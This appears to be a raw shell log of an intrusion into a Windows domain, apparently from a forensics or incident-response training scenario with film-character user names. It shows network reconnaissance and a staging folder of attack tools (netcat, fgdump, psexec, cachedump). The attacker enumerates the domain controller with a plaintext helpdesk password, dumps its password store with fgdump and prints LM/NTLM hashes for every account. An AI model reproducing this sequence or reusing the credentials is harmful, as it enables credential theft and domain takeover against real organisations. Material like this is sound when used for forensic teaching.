03/08/2012  09:00 PM         1,098,540 d.7z
03/06/2012  02:41 PM            49,152 enum.exe
03/06/2012  02:41 PM           974,848 fgdump.exe
03/08/2012  09:00 PM               100 ftp_helo.txt
03/06/2012  10:34 PM            94,208 HoboCopy.exe
01/07/2009  06:21 PM             1,876 msfeeds.mof
01/07/2009  06:21 PM             1,938 msfeedsbs.mof
03/06/2012  02:41 PM            59,392 nc.exe
03/06/2012  02:41 PM           146,704 pdh.dll
03/06/2012  02:41 PM           229,376 plink.exe
03/06/2012  02:42 PM           131,072 psexec.exe
03/06/2012  11:23 PM            94,208 pskill.exe
02/23/2012  11:12 AM             8,704 taskhosts.exe
03/06/2012  03:48 PM           200,779 UserInfo.exe
03/06/2012  02:42 PM           308,736 wget.exe
              18 File(s)      4,110,363 bytes
               2 Dir(s)   7,727,263,744 bytes free

C:\WINDOWS\WBEM>ipconfig /all
ipconfig /all


Windows IP Configuration



        Host Name . . . . . . . . . . . . : SICCO446EQ

        Primary Dns Suffix  . . . . . . . : siccoinc.com

        Node Type . . . . . . . . . . . . : Hybrid

        IP Routing Enabled. . . . . . . . : No

        WINS Proxy Enabled. . . . . . . . : No

        DNS Suffix Search List. . . . . . : siccoinc.com

                                            siccoinc.com



Ethernet adapter Local Area Connection:



        Connection-specific DNS Suffix  . : siccoinc.com

        Description . . . . . . . . . . . : VMware Accelerated AMD PCNet Adapter

        Physical Address. . . . . . . . . : 00-50-56-99-22-ED

        Dhcp Enabled. . . . . . . . . . . : Yes

        Autoconfiguration Enabled . . . . : Yes

        IP Address. . . . . . . . . . . . : 10.10.54.111

        Subnet Mask . . . . . . . . . . . : 255.255.255.0

        Default Gateway . . . . . . . . . : 10.10.54.1

        DHCP Server . . . . . . . . . . . : 10.10.53.2

        DNS Servers . . . . . . . . . . . : 10.10.53.2

        Lease Obtained. . . . . . . . . . : Wednesday, March 07, 2012 4:00:29 PM

        Lease Expires . . . . . . . . . . : Thursday, March 15, 2012 4:00:29 PM


C:\WINDOWS\WBEM>netstat -nao
netstat -nao

Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       976
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    10.10.54.111:139       0.0.0.0:0              LISTENING       4
  TCP    10.10.54.111:2915      60.235.12.64:443       ESTABLISHED     4732
  TCP    10.10.54.111:2923      10.10.53.2:1025        ESTABLISHED     1104
  TCP    10.10.54.111:2926      10.10.53.104:31375     ESTABLISHED     1104
  TCP    10.10.54.111:2929      10.10.53.104:31375     ESTABLISHED     1104
  TCP    10.10.54.111:3508      203.57.206.173:443     ESTABLISHED     9732
  TCP    10.10.54.111:3509      203.57.206.173:443     ESTABLISHED     3528
  TCP    127.0.0.1:1042         0.0.0.0:0              LISTENING       1496
  TCP    127.0.0.1:5152         0.0.0.0:0              LISTENING       1656
  TCP    127.0.0.1:5152         127.0.0.1:3356         CLOSE_WAIT      1656
  UDP    0.0.0.0:445            *:*                                    4
  UDP    0.0.0.0:500            *:*                                    712
  UDP    0.0.0.0:4500           *:*                                    712
  UDP    10.10.54.111:123       *:*                                    1068
  UDP    10.10.54.111:137       *:*                                    4
  UDP    10.10.54.111:138       *:*                                    4
  UDP    10.10.54.111:1900      *:*                                    1228
  UDP    127.0.0.1:123          *:*                                    1068
  UDP    127.0.0.1:1025         *:*                                    712
  UDP    127.0.0.1:1045         *:*                                    656
  UDP    127.0.0.1:1377         *:*                                    1980
  UDP    127.0.0.1:1900         *:*                                    1228
  UDP    127.0.0.1:2935         *:*                                    1104
  UDP    127.0.0.1:2974         *:*                                    1104
  UDP    127.0.0.1:3218         *:*                                    6672
  UDP    127.0.0.1:3246         *:*                                    8220

C:\WINDOWS\WBEM>arp -a
arp -a

Interface: 10.10.54.111 --- 0x2
  Internet Address      Physical Address      Type
  10.10.54.1            00-15-fa-f4-d1-9c     dynamic   

C:\WINDOWS\WBEM>net localgroup administrators
net localgroup administrators
Alias name     administrators

```

## 4_5 password dump (C2)

```
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\droskow>cd C:\Windows\WBEM\
cd C:\Windows\WBEM\

C:\WINDOWS\WBEM>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 08FE-2AA7

 Directory of C:\WINDOWS\WBEM

03/08/2012  09:01 PM    <DIR>          .
03/08/2012  09:01 PM    <DIR>          ..
03/08/2012  09:00 PM           587,776 7za.exe
03/06/2012  02:34 PM            73,802 asdf.exe
03/06/2012  02:41 PM            49,152 cachedump.exe
03/08/2012  09:00 PM         1,098,540 d.7z
03/06/2012  02:41 PM            49,152 enum.exe
03/06/2012  02:41 PM           974,848 fgdump.exe
03/08/2012  09:00 PM               100 ftp_helo.txt
03/06/2012  10:34 PM            94,208 HoboCopy.exe
01/07/2009  06:21 PM             1,876 msfeeds.mof
01/07/2009  06:21 PM             1,938 msfeedsbs.mof
03/06/2012  02:41 PM            59,392 nc.exe
03/06/2012  02:41 PM           146,704 pdh.dll
03/06/2012  02:41 PM           229,376 plink.exe
03/06/2012  02:42 PM           131,072 psexec.exe
03/06/2012  11:23 PM            94,208 pskill.exe
02/23/2012  11:12 AM             8,704 taskhosts.exe
03/06/2012  03:48 PM           200,779 UserInfo.exe
03/06/2012  02:42 PM           308,736 wget.exe
              18 File(s)      4,110,363 bytes
               2 Dir(s)   7,727,263,744 bytes free

C:\WINDOWS\WBEM>ipconfig /all
ipconfig /all


Windows IP Configuration



        Host Name . . . . . . . . . . . . : SICCO446EQ

        Primary Dns Suffix  . . . . . . . : siccoinc.com

        Node Type . . . . . . . . . . . . : Hybrid

        IP Routing Enabled. . . . . . . . : No

        WINS Proxy Enabled. . . . . . . . : No

        DNS Suffix Search List. . . . . . : siccoinc.com

                                            siccoinc.com



Ethernet adapter Local Area Connection:



        Connection-specific DNS Suffix  . : siccoinc.com

        Description . . . . . . . . . . . : VMware Accelerated AMD PCNet Adapter

        Physical Address. . . . . . . . . : 00-50-56-99-22-ED

        Dhcp Enabled. . . . . . . . . . . : Yes

        Autoconfiguration Enabled . . . . : Yes

        IP Address. . . . . . . . . . . . : 10.10.54.111

        Subnet Mask . . . . . . . . . . . : 255.255.255.0

        Default Gateway . . . . . . . . . : 10.10.54.1

        DHCP Server . . . . . . . . . . . : 10.10.53.2

        DNS Servers . . . . . . . . . . . : 10.10.53.2

        Lease Obtained. . . . . . . . . . : Wednesday, March 07, 2012 4:00:29 PM

        Lease Expires . . . . . . . . . . : Thursday, March 15, 2012 4:00:29 PM


C:\WINDOWS\WBEM>netstat -nao
netstat -nao

Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       976
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    10.10.54.111:139       0.0.0.0:0              LISTENING       4
  TCP    10.10.54.111:2915      60.235.12.64:443       ESTABLISHED     4732
  TCP    10.10.54.111:2923      10.10.53.2:1025        ESTABLISHED     1104
  TCP    10.10.54.111:2926      10.10.53.104:31375     ESTABLISHED     1104
  TCP    10.10.54.111:2929      10.10.53.104:31375     ESTABLISHED     1104
  TCP    10.10.54.111:3508      203.57.206.173:443     ESTABLISHED     9732
  TCP    10.10.54.111:3509      203.57.206.173:443     ESTABLISHED     3528
  TCP    127.0.0.1:1042         0.0.0.0:0              LISTENING       1496
  TCP    127.0.0.1:5152         0.0.0.0:0              LISTENING       1656
  TCP    127.0.0.1:5152         127.0.0.1:3356         CLOSE_WAIT      1656
  UDP    0.0.0.0:445            *:*                                    4
  UDP    0.0.0.0:500            *:*                                    712
  UDP    0.0.0.0:4500           *:*                                    712
  UDP    10.10.54.111:123       *:*                                    1068
  UDP    10.10.54.111:137       *:*                                    4
  UDP    10.10.54.111:138       *:*                                    4
  UDP    10.10.54.111:1900      *:*                                    1228
  UDP    127.0.0.1:123          *:*                                    1068
  UDP    127.0.0.1:1025         *:*                                    712
  UDP    127.0.0.1:1045         *:*                                    656
  UDP    127.0.0.1:1377         *:*                                    1980
  UDP    127.0.0.1:1900         *:*                                    1228
  UDP    127.0.0.1:2935         *:*                                    1104
  UDP    127.0.0.1:2974         *:*                                    1104
  UDP    127.0.0.1:3218         *:*                                    6672
  UDP    127.0.0.1:3246         *:*                                    8220

C:\WINDOWS\WBEM>arp -a
arp -a

Interface: 10.10.54.111 --- 0x2
  Internet Address      Physical Address      Type
  10.10.54.1            00-15-fa-f4-d1-9c     dynamic   

C:\WINDOWS\WBEM>net localgroup administrators
net localgroup administrators
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
SICCOINC\Domain Admins
SICCOINC\droskow
SICCOINC\Helpdesk
The command completed successfully.


C:\WINDOWS\WBEM>net localgroup administrator /domain
net localgroup administrator /domain
The request will be processed at a domain controller for domain siccoinc.com.

System error 1376 has occurred.

The specified local group does not exist.


C:\WINDOWS\WBEM>net accounts
net accounts
Force user logoff how long after time expires?:       Never
Minimum password age (days):                          1
Maximum password age (days):                          42
Minimum password length:                              7
Length of password history maintained:                24
Lockout threshold:                                    Never
Lockout duration (minutes):                           30
Lockout observation window (minutes):                 30
Computer role:                                        WORKSTATION
The command completed successfully.


C:\WINDOWS\WBEM>net localgroup administrators /domain
net localgroup administrators /domain
The request will be processed at a domain controller for domain siccoinc.com.

Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
Domain Admins
Enterprise Admins
The command completed successfully.


C:\WINDOWS\WBEM>net view
net view
Server Name            Remark

-------------------------------------------------------------------------------
\\SICCO38K16           Marsellus Wallace Workstation                           
\\SICCO446EQ           Darren Roskow Laptop                                    
\\SICCO4IF54           Lando Calrissian Laptop                                 
\\SICCO4U9BJ           Martin Bishops Laptop                                   
\\SICCO8BF37           Stanley Jobson Laptop                                   
\\SICCO9AD70           Ellen Ripley Laptop                                     
\\SICCOHJ8Q1           Vincent Vega Laptop                                     
\\SICCOM4094           Ramon Sanchez Laptop                                    
\\SICCORV5LN           Hugo Stiglitz Workstation                               
\\SICCOSVR01                                                                   
\\SICCOSVR02                                                                   
\\SICCOSVR04                                                                   
\\SICCOSVR05                                                                   
\\SICCOT53Q2           Donny Kerabatsos Laptop                                 
\\SICCOVZGZ5           Jules Winnfield Laptop                                  
The command completed successfully.


C:\WINDOWS\WBEM>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 08FE-2AA7

 Directory of C:\WINDOWS\WBEM

03/08/2012  09:01 PM    <DIR>          .
03/08/2012  09:01 PM    <DIR>          ..
03/08/2012  09:00 PM           587,776 7za.exe
03/06/2012  02:34 PM            73,802 asdf.exe
03/06/2012  02:41 PM            49,152 cachedump.exe
03/08/2012  09:00 PM         1,098,540 d.7z
03/06/2012  02:41 PM            49,152 enum.exe
03/06/2012  02:41 PM           974,848 fgdump.exe
03/08/2012  09:00 PM               100 ftp_helo.txt
03/06/2012  10:34 PM            94,208 HoboCopy.exe
01/07/2009  06:21 PM             1,876 msfeeds.mof
01/07/2009  06:21 PM             1,938 msfeedsbs.mof
03/06/2012  02:41 PM            59,392 nc.exe
03/06/2012  02:41 PM           146,704 pdh.dll
03/06/2012  02:41 PM           229,376 plink.exe
03/06/2012  02:42 PM           131,072 psexec.exe
03/06/2012  11:23 PM            94,208 pskill.exe
02/23/2012  11:12 AM             8,704 taskhosts.exe
03/06/2012  03:48 PM           200,779 UserInfo.exe
03/06/2012  02:42 PM           308,736 wget.exe
              18 File(s)      4,110,363 bytes
               2 Dir(s)   7,727,181,824 bytes free

C:\WINDOWS\WBEM>enum.exe
enum.exe
Enum+ add Bruce Force crack from enum, -- Bingle@email.com.cn
usage:  enum.exe  [switches]  [hostname|ip]
  -U:  get userlist
  -M:  get machine list
  -N:  get namelist dump (different from -U|-M)
  -S:  get sharelist
  -P:  get password policy information
  -G:  get group and member list
  -L:  get LSA policy information
  -d:  be detailed, applies to -U and -S
  -D:  dictionary crack, needs -u and -f
  -b:  bruce force crack, needs -u for specify user to crack
  -c:  don't cancel sessions
  -u:  specify username to use (default "")
  -p:  specify password to use (default "")
  -f:  specify dictfile to use (wants -D)

 Example:
	 To get share of 10.1.1.1 use:enum.exe -S 10.1.1.1
	 To use admin whith passwd abc to connect, then get userlist of server 
		use: enum.exe -U -u admin -p abc server 

C:\WINDOWS\WBEM>enum.exe -U -M -N -S -P -G -L -u Helpdesk -u H3lp0M3!! 10.10.53.2
enum.exe -U -M -N -S -P -G -L -u Helpdesk -u H3lp0M3!! 10.10.53.2
username: Helpdesk
username: H3lp0M3!!
server: 10.10.53.2
setting up session... fail.
return 1326, Logon failure: unknown user name or bad password.


C:\WINDOWS\WBEM>enum.exe -U -M -N -S -P -G -L -u Helpdesk -p H3lp0M3!! 10.10.53.2
enum.exe -U -M -N -S -P -G -L -u Helpdesk -p H3lp0M3!! 10.10.53.2
username: Helpdesk
password: H3lp0M3!!
server: 10.10.53.2
setting up session... success.
password policy:
  min length: 7 chars
  min age: 1 days
  max age: 42 days
  lockout threshold: none
  lockout duration: 30 mins
  lockout reset: 30 mins
opening lsa policy... success.
server role: 3 [primary (unknown)]
names:
  netbios: SICCOINC
  domain: SICCOINC
quota:
  paged pool limit: 33554432
  non paged pool limit: 1048576
  min work set size: 65536
  max work set size: 251658240
  pagefile limit: 688536
  time limit: 0
trusted domains:
  indeterminate
netlogon done by a PDC server
getting namelist (pass 1)... got 46, 4 left:
  Administrator  Guest  krbtgt  SUPPORT_388945a0  ASPNET  a-root  share
  mbishop  dkerabatsos  mwallace  jwinnfield  hstiglitz  ejohnson  droskow
  lsalander  pvenkman  rstantz  twebb  cspackler  eripley  kflynn  dmurphy
  rsanchez  pcook  klibby  tanderson  lcalrissian  sjobson  vvega  awaves
  CIRT  helpdesk  SICCOSVR01$  SICCO4U9BJ$  SICCO4IF54$  SICCOHJ8Q1$
  SICCOM4094$  SICCO446EQ$  SICCORV5LN$  SICCOT53Q2$  SICCOVZGZ5$
  SICCO9AD70$  SICCO38K16$  SICCOSVR05$  SICCOSVR04$  SICCOSVR02$
getting namelist (pass 2)... got 4, 0 left:
  SICCOSVR00$  SICCOSVR08$  SICCO3MW9F$  SICCO8BF37$
getting user list (pass 1, index 0)... success, got 32.
  a-root  Administrator  ASPNET  awaves  CIRT  cspackler  dkerabatsos
  dmurphy  droskow  ejohnson  eripley  Guest  helpdesk  hstiglitz
  jwinnfield  kflynn  klibby  krbtgt  lcalrissian  lsalander  mbishop
  mwallace  pcook  pvenkman  rsanchez  rstantz  share  sjobson
  SUPPORT_388945a0  tanderson  twebb  vvega
enumerating shares (pass 1)... got 5 shares, 0 left:
  C$  IPC$  ADMIN$  SYSVOL  NETLOGON
getting machine list (pass 1, index 0)... success, got 18.
  SICCO38K16$  SICCO3MW9F$  SICCO446EQ$  SICCO4IF54$  SICCO4U9BJ$
  SICCO8BF37$  SICCO9AD70$  SICCOHJ8Q1$  SICCOM4094$  SICCORV5LN$
  SICCOSVR00$  SICCOSVR01$  SICCOSVR02$  SICCOSVR04$  SICCOSVR05$
  SICCOSVR08$  SICCOT53Q2$  SICCOVZGZ5$
Group: Account Operators
Group: Administrators
SICCOINC\Administrator
SICCOINC\Enterprise Admins
SICCOINC\Domain Admins
Group: Backup Operators
Group: Distributed COM Users
Group: Guests
SICCOINC\Guest
SICCOINC\Domain Guests
Group: Incoming Forest Trust Builders
Group: Network Configuration Operators
Group: Performance Log Users
NT AUTHORITY\NETWORK SERVICE
Group: Performance Monitor Users
Group: Pre-Windows 2000 Compatible Access
NT AUTHORITY\Authenticated Users
Group: Print Operators
Group: Remote Desktop Users
Group: Replicator
Group: Server Operators
Group: Terminal Server License Servers
Group: Users
SICCOINC\ASPNET
NT AUTHORITY\INTERACTIVE
NT AUTHORITY\Authenticated Users
SICCOINC\Domain Users
Group: Windows Authorization Access Group
NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS
SICCOINC\Exchange Servers
Group: Cert Publishers
Group: RAS and IAS Servers
Group: HelpServicesGroup
SICCOINC\SUPPORT_388945a0
Group: TelnetClients
Group: DnsAdmins
Group: DHCP Users
Group: DHCP Administrators
cleaning up... success.

C:\WINDOWS\WBEM>fgdump.exe -h 10.10.53.2 -u Helpdesk -p H3lp0M3!!
fgdump.exe -h 10.10.53.2 -u Helpdesk -p H3lp0M3!!
fgDump 2.1.0 - fizzgig and the mighty group at foofus.net
Written to make j0m0kun's life just a bit easier
Copyright(C) 2008 fizzgig and foofus.net
fgdump comes with ABSOLUTELY NO WARRANTY!
This is free software, and you are welcome to redistribute it
under certain conditions; see the COPYING and README files for
more information.

--- Session ID: 2012-03-09-02-08-20 ---
ERROR OpenService: 5 - Access is denied.


ERROR OpenService: 5 - Access is denied.


ERROR OpenService: 5 - Access is denied.


Unable to stop any McAfee services, see previous errors for details.
Starting dump on 10.10.53.2

** Beginning dump on server 10.10.53.2 **
OS (10.10.53.2): Microsoft Windows 2003 Unknown Service Pack 2 (Build 3790)  
Passwords dumped successfully
Cache dumped successfully

-----Summary-----

Failed servers:
NONE

Successful servers:
10.10.53.2

Total failed: 0
Total successful: 1

C:\WINDOWS\WBEM>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 08FE-2AA7

 Directory of C:\WINDOWS\WBEM

03/08/2012  09:08 PM    <DIR>          .
03/08/2012  09:08 PM    <DIR>          ..
03/08/2012  09:08 PM               226 10.10.53.2.cachedump
03/08/2012  09:08 PM             5,973 10.10.53.2.pwdump
03/08/2012  09:08 PM               714 2012-03-09-02-08-20.fgdump-log
03/08/2012  09:00 PM           587,776 7za.exe
03/06/2012  02:34 PM            73,802 asdf.exe
03/06/2012  02:41 PM            49,152 cachedump.exe
03/08/2012  09:00 PM         1,098,540 d.7z
03/06/2012  02:41 PM            49,152 enum.exe
03/06/2012  02:41 PM           974,848 fgdump.exe
03/08/2012  09:00 PM               100 ftp_helo.txt
03/06/2012  10:34 PM            94,208 HoboCopy.exe
01/07/2009  06:21 PM             1,876 msfeeds.mof
01/07/2009  06:21 PM             1,938 msfeedsbs.mof
03/06/2012  02:41 PM            59,392 nc.exe
03/06/2012  02:41 PM           146,704 pdh.dll
03/06/2012  02:41 PM           229,376 plink.exe
03/06/2012  02:42 PM           131,072 psexec.exe
03/06/2012  11:23 PM            94,208 pskill.exe
02/23/2012  11:12 AM             8,704 taskhosts.exe
03/06/2012  03:48 PM           200,779 UserInfo.exe
03/06/2012  02:42 PM           308,736 wget.exe
              21 File(s)      4,117,276 bytes
               2 Dir(s)   7,726,780,416 bytes free

C:\WINDOWS\WBEM>type 10.10.53.2pwdump
type 10.10.53.2pwdump
The system cannot find the file specified.

C:\WINDOWS\WBEM>type 10.10.53.2.pwdump
type 10.10.53.2.pwdump
Administrator:500:B34CE522C3E4C8774A3B108F3FA6CB6D:A87F3A337D73085C45F9416BE5787D86:::
Guest:501:NO PASSWORD*********************:NO PASSWORD*********************:::
krbtgt:502:NO PASSWORD*********************:C23090B586D1D27D422B54669B6301F2:::
SUPPORT_388945a0:1001:NO PASSWORD*********************:BF3C0FB54CB2A014F2A6A3AA57BA130A:::
ASPNET:1003:BB73D4AEFC5AC5BED2EE19E7825CE282:2F62176E0EB9D89DEBC291F9836E7352:::
a-root:1109:A6BFF5087D355D1B82E71C8EDFFFE434:AEBAB1DF7D05C839DD8ADB92EB0610E8:::
share:1146:B34CE522C3E4C8774A3B108F3FA6CB6D:A87F3A337D73085C45F9416BE5787D86:::
mbishop:1148:B4E256F6A4FE6ABAD5521B7F13E54C83:F71E02E904A78107B417C945D5C29A8F:::
dkerabatsos:1149:76E53CB3ADE8CA6AD3F512AEC07A0256:8AEAF35DE5B5A22A48A29C2ADE1737A5:::
mwallace:1150:A7A997CBDF31217EB8EEE99B9E7E7F4A:C448CACE139982D3CCD9C450811BECFF:::
jwinnfield:1151:A7A997CBDF31217EB8EEE99B9E7E7F4A:C448CACE139982D3CCD9C450811BECFF:::
hstiglitz:1152:F6F775AD0B755CD7EF61ECAD58876205:7558D7659E1E172030521A3CC87EF081:::
ejohnson:1153:NO PASSWORD*********************:7466A745899F62B78594CAEC31677F44:::
droskow:1154:B4E256F6A4FE6ABAD5521B7F13E54C83:F71E02E904A78107B417C945D5C29A8F:::
lsalander:1155:47508B8B7B419A3BFEA76CC634A4023A:6287A397A0919FAFF8AD9D3932F7BD61:::
pvenkman:1156:85AE820CC432B9DAACBEB1616D93D0C4:EB228F32BFA9A2B6ED386DFA64B930D1:::
rstantz:1157:85AE820CC432B9DAACBEB1616D93D0C4:EB228F32BFA9A2B6ED386DFA64B930D1:::
twebb:1158:ABF056135D9C358A4426B7C206B01265:5C4468DF3FE994DEFC16C8086FBDD3B1:::
cspackler:1159:ABF056135D9C358A4426B7C206B01265:5C4468DF3FE994DEFC16C8086FBDD3B1:::
eripley:1160:B0E11C6869AE028B98530066718ABDD6:CAB390FD0633EB17DE188EC87074C710:::
kflynn:1161:BF0AE03AEF9173DA51A5B8AC7AA47F8A:BC41FA177C793D74C6E791B054290010:::
dmurphy:1162:CEEDEFED8E7FBF30695109AB020E401C:CFA27538A5EDD2B1B15DF8DC63945376:::
rsanchez:1163:CEEDEFED8E7FBF30695109AB020E401C:CFA27538A5EDD2B1B15DF8DC63945376:::
pcook:1164:CEEDEFED8E7FBF30695109AB020E401C:CFA27538A5EDD2B1B15DF8DC63945376:::
klibby:1165:CEEDEFED8E7FBF30695109AB020E401C:CFA27538A5EDD2B1B15DF8DC63945376:::
tanderson:1166:B4ECFEF488750B8DA210010AC6081EAF:9221BEA0E8DDEE463516E8D478571E84:::
lcalrissian:1167:93F48AAEF4A9560682F18DFCF2B56D48:7C9A6D1B366F6EAFA6DA0ADADA937BA9:::
sjobson:1168:BDCA0D1E2231A5E5730D80E6F9E1E407:55A54C4EF0E6470B657324E106CA6CAA:::
vvega:1169:A7A997CBDF31217EB8EEE99B9E7E7F4A:C448CACE139982D3CCD9C450811BECFF:::
awaves:1170:NO PASSWORD*********************:01BA029DC3E212A8892533F3B94E8F00:::
awaves_history_0:1170:694893960E9B22262A52164C0339C9D7:27FFD67C5DF499058D06FDE49F620104:::
CIRT:1172:NO PASSWORD*********************:61786884D94072B934A68274520D1A77:::
CIRT_history_0:1172:133B35A2E652C2C1288B2D704D3E4A5E:CB5F65116E9D37A2807241393E105835:::
helpdesk:1176:5758F5E5F08ADFCE6E72264E11F708C0:1589EAE5B299E287780A71BD5048D33D:::
SICCOSVR01$:1004:NO PASSWORD*********************:239E8D175F4C44AD54DF2DD2680F07EA:::
SICCOSVR01$_history_0:1004:3355ED16AB329BFE47DD449C0533D70B:DF1A1144092850B1748C4A2ABDF3DCA0:::
SICCO4U9BJ$:1110:NO PASSWORD*********************:487953DA6B6DCEF0D6E57CAA55CA410F:::
SICCO4U9BJ$_history_0:1110:NO PASSWORD*********************:1D211B23D953F608B03783D994E1E2C3:::
SICCO4IF54$:1111:NO PASSWORD*********************:F6DB54D7C10ECB2298C60F9556146592:::
SICCO4IF54$_history_0:1111:NO PASSWORD*********************:A8FE9C446A24DB69F8EFA62664745120:::
SICCOHJ8Q1$:1112:NO PASSWORD*********************:DE7019E724E91E4657E4369BFF1BC34A:::
SICCOHJ8Q1$_history_0:1112:NO PASSWORD*********************:2E40153CBB1EB8D278BE5A85F89B717D:::
SICCOM4094$:1113:NO PASSWORD*********************:9850BB7A56F9FE0B1E6EDD7C7F9821E1:::
SICCOM4094$_history_0:1113:NO PASSWORD*********************:7B3EB36D3713CDA588F78E60B426D0F3:::
SICCO446EQ$:1114:NO PASSWORD*********************:13F4C0B3AFFF00D31F20E8DAEA9AE924:::
SICCO446EQ$_history_0:1114:A351B84A9DBD641AD86E762D4EEEF503:AE4959B4DFA81BFEF8172EBC56C12C2B:::
SICCO446EQ$_history_1:1114:NO PASSWORD*********************:01B4E91E856F0DB4DC06E3EBF6252E2A:::
SICCO446EQ$_history_2:1114:NO PASSWORD*********************:073B3A1322E213D6A6F5E9609E2CD6B9:::
SICCORV5LN$:1115:NO PASSWORD*********************:4C7E2E479B77AB3E04BD32B736C45D12:::
SICCORV5LN$_history_0:1115:NO PASSWORD*********************:89033BB4C15C0B5CC429679ECD8A05D4:::
SICCOT53Q2$:1116:NO PASSWORD*********************:388118329DEE7C8533E5CF0C20439FDF:::
SICCOT53Q2$_history_0:1116:NO PASSWORD*********************:7736210C53D0306BF19A5AD136391BF9:::
SICCOVZGZ5$:1117:NO PASSWORD*********************:10DFE5D780695FD5AB20D428A1AD6E0A:::
SICCOVZGZ5$_history_0:1117:NO PASSWORD*********************:84E6A9207FF41870A4F3030207A26A3C:::
SICCO9AD70$:1118:NO PASSWORD*********************:31ED1CB83C6386C47EEF099737A796A5:::
SICCO9AD70$_history_0:1118:NO PASSWORD*********************:BD4FD94822E630162DB6D27C2DF7FC32:::
SICCO38K16$:1119:NO PASSWORD*********************:3946203F435BD84293DF06965FD3F718:::
SICCO38K16$_history_0:1119:NO PASSWORD*********************:A0793494FC3E7C6003C8FAC130892635:::
SICCOSVR05$:1120:NO PASSWORD*********************:BAA3463A0F6AAD207FE9A60EBE5F7F68:::
SICCOSVR05$_history_0:1120:NO PASSWORD*********************:55CC4173E0827344B5661812A68F3C97:::
SICCOSVR04$:1121:NO PASSWORD*********************:D9FAFA37846CC46B8D9A17E7D8B4DAB7:::
SICCOSVR04$_history_0:1121:NO PASSWORD*********************:423A0A1974AF48D021A0F7B52EA5B1BA:::
SICCOSVR02$:1122:NO PASSWORD*********************:EB87289DFACAEC30C7FD34EB948CC707:::
SICCOSVR02$_history_0:1122:NO PASSWORD*********************:CAADA8A9B352B6B07467E93956DA21C9:::
SICCOSVR00$:1123:NO PASSWORD*********************:EA2696B4B181F1AD71EA6CBC7D01982B:::
SICCOSVR08$:1171:NO PASSWORD*********************:4EA731A7F13E8C7BAF0772B725F10200:::
SICCO3MW9F$:1173:NO PASSWORD*********************:1A2393E5217884E80552F9AE1D00FA85:::
SICCO8BF37$:1177:NO PASSWORD*********************:A939CA8EFC24AD34AF7D0C127BED892D:::

C:\WINDOWS\WBEM>UserInfo.exe \\10.10.53.2 mbishop
UserInfo.exe \\10.10.53.2 mbishop

	UserInfo v1.5 - thor@hammerofgod.com 

	Querying Controller \\10.10.53.2

	USER INFO
	Username:       mbishop
	Full Name:      Martin Bishop
	Comment:        
	User Comment:   
	User ID:        1148
	Primary Grp:    513
	Privs:          User Privs
	OperatorPrivs:  No explicit OP Privs

	SYSTEM FLAGS (Flag dword is 513)

	MISC INFO
	Password age: 	Tue Feb 14 15:54:00 2012
	LastLogon:    	Wed Mar 07 15:46:42 2012
	LastLogoff:   	Thu Jan 01 00:00:00 1970
	Acct Expires:   Never 
	Max Storage:    Unlimited 
	Workstations:   
	UnitsperWeek:   168
	Bad pw Count:   0
	Num logons:     14
	Country code:   0
	Code page:      0
	Profile:        
	ScriptPath:     
	Homedir drive:  
	Home Dir:       
	PasswordExp:    0

	Logon hours at controller, GMT:
	Hours-          12345678901N12345678901M
	Sunday          111111111111111111111111
	Monday          111111111111111111111111
	Tuesday         111111111111111111111111
	Wednesday       111111111111111111111111
	Thursday        111111111111111111111111
	Friday          111111111111111111111111
	Saturday        111111111111111111111111

	Get hammered at HammerofGod.com! 

C:\WINDOWS\WBEM>UserInfo.exe \\10.10.53.2 jwinnfield
UserInfo.exe \\10.10.53.2 jwinnfield

	UserInfo v1.5 - thor@hammerofgod.com 

	Querying Controller \\10.10.53.2

	USER INFO
	Username:       jwinnfield
	Full Name:      Jules Winnfield
	Comment:        
	User Comment:   
	User ID:        1151
	Primary Grp:    513
	Privs:          User Privs
	OperatorPrivs:  No explicit OP Privs

	SYSTEM FLAGS (Flag dword is 513)

	MISC INFO
	Password age: 	Tue Feb 14 16:02:56 2012
	LastLogon:    	Wed Mar 07 16:02:27 2012
	LastLogoff:   	Thu Jan 01 00:00:00 1970
	Acct Expires:   Never 
	Max Storage:    Unlimited 
	Workstations:   
	UnitsperWeek:   168
	Bad pw Count:   0
	Num logons:     12
	Country code:   0
	Code page:      0
	Profile:        
	ScriptPath:     
	Homedir drive:  
	Home Dir:       
	PasswordExp:    0

	Logon hours at controller, GMT:
	Hours-          12345678901N12345678901M
	Sunday          111111111111111111111111
	Monday          111111111111111111111111
	Tuesday         111111111111111111111111
	Wednesday       111111111111111111111111
	Thursday        111111111111111111111111
	Friday          111111111111111111111111
	Saturday        111111111111111111111111

	Get hammered at HammerofGod.com! 

C:\WINDOWS\WBEM>UserInfo.exe \\10.10.53.2 vvega
UserInfo.exe \\10.10.53.2 vvega

	UserInfo v1.5 - thor@hammerofgod.com 

	Querying Controller \\10.10.53.2

	USER INFO
	Username:       vvega
	Full Name:      Vincent Vega
	Comment:        
	User Comment:   
	User ID:        1169
	Primary Grp:    513
	Privs:          User Privs
	OperatorPrivs:  No explicit OP Privs

	SYSTEM FLAGS (Flag dword is 513)

	MISC INFO
	Password age: 	Tue Feb 14 16:28:51 2012
	LastLogon:    	Thu Mar 08 21:45:54 2012
	LastLogoff:   	Thu Jan 01 00:00:00 1970
	Acct Expires:   Never 
	Max Storage:    Unlimited 
	Workstations:   
	UnitsperWeek:   168
	Bad pw Count:   0
	Num logons:     171
	Country code:   0
	Code page:      0
	Profile:        
	ScriptPath:     
	Homedir drive:  
	Home Dir:       
	PasswordExp:    0

	Logon hours at controller, GMT:
	Hours-          12345678901N12345678901M
	Sunday          111111111111111111111111
	Monday          111111111111111111111111
	Tuesday         111111111111111111111111
	Wednesday       111111111111111111111111
	Thursday        111111111111111111111111
	Friday          111111111111111111111111
	Saturday        111111111111111111111111

	Get hammered at HammerofGod.com! 

